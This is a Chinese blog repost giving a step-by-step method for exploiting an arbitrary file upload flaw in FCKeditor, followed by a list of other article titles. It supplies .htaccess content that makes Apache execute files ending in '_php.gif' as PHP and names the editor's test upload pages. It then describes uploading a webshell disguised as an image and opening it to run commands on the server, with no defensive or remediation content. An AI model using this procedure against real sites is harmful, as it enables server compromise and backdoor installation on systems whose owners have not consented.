fckeditor任意文件上传漏洞
来源:互联网 发布:从零开始学java 第三版 编辑:程序博客网 时间:2024/04/28 16:54
1. 创建.htaccess文件,内容如下:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>
.htaccess文件可以用来设置某个目录和某个目录的子目录的权限,以上内容的意思是将扩展名是"_php.gif"的文件解析成php
2.使用如下url,上传上面创建的的.htaccess文件
http://target.com/FCKeditor/editor/filemanager/upload/test.html
http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
通过这一步上传,上传目录的"_php.gif"文件apache会按照php文件解析
3.上传shell.php.gif文件
这一步还是使用如下url:
http://target.com/FCKeditor/editor/filemanager/upload/test.html
http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
shell.php.gif文件被上传后,自动更名为shell_php.gif,shell_php.gif文件就是后门文件
4.访问shell_php.gif,则可以,shell执行
0 0
- fckeditor任意文件上传漏洞
- FCKeditor connector.php任意文件上传漏洞
- Fckeditor <=2.4.2 For php 任意上传文件漏洞
- Fckeditor <=2.4.2 For php 任意上传文件漏洞
- Fckeditor 2.4.2 php任意上传文件漏洞
- fckeditor <= 2.6.4 任意文件上传漏洞
- Fckeditor 2.4.2 php任意上传文件漏洞+修补方法
- fckeditor <= 2.6.4 任意文件上传漏洞
- fckeditor <= 2.6.4 任意文件上传漏洞
- fckeditor <= 2.6.4 任意文件上传漏洞
- fckeditor文件上传漏洞(.NET)
- Fckeditor <= 2.4.2 的任意文件上传漏洞代码解析
- PHP任意文件上传漏洞
- F2blog XMLRPC 上传任意文件漏洞
- PHPCMS最新版任意文件上传漏洞分析
- FCKeditor上传漏洞总结
- FCKeditor编辑器上传漏洞
- evoArticles网站管理系统任意文件上传漏洞
- 计算几何模板(二维)
- linux下应用安装
- C# 接口---构建可枚举类型 14/02/26
- Xtrabackup&Innobackupex备份和恢复
- C# 动态添加Button
- fckeditor任意文件上传漏洞
- POJ1038
- Ubuntu下qt5.0.2的mysql驱动安装
- nodejs和java的AES加密结果保持一致
- 修正官网Fragment Demo~!
- TreeView绑定数据库
- 不能错过的XCode插件
- Windows7下OpenGL简单使用举例
- Python装饰器与面向切面编程(转)